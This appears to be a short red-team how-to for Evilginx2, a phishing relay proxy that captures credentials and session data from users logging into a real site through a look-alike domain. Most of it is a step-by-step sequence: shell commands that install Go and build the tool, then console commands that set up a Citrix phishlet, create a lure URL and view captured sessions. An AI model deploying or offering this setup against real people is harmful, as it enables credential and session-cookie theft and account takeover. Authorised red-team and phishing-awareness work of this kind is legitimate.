Evilginx

Evilginx is a relay framework that acts as a web proxy for Red Teams to phish credentials. The phished user interacts with the real website while Evilginx captures all data transmitted. Full ownership of a look-alike domain is required.

In order to use it, first, download and install it in the phishing server:

sudo apt update

wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz

sudo tar -xvf go1.11.linux-amd64.tar.gz

sudo mv go /usr/local

sudo cp /usr/local/go/bin/go /usr/bin/

nano .profile

export GOPATH=$HOME/

export PATH=$PATH:/usr/local/go:$GOPATH/bin

source .profile

#sudo systemctl stop systemd-resolved

#sudo apt-get install git make -y

go get -u github.com/kgretzky/evilginx2

cd $GOPATH/src/github.com/kgretzky/evilginx2

cd $GOPATH/bin

sudo ./evilginx2 -p $GOPATH/src/github.com/kgretzky/evilginx2/phishlets/

Then, to configure it, for example for citrix, the legit one is target.citrix.com and the domain we own and the one we are using for the phshing is target.example.com:

config domain example.com

config ip {target.example.com IP address}

phishlets hostname citrix example.com

phishlets enable citrix

lures create citrix

lures edit O redirect_url https://example.com

lures get-url 0

sessions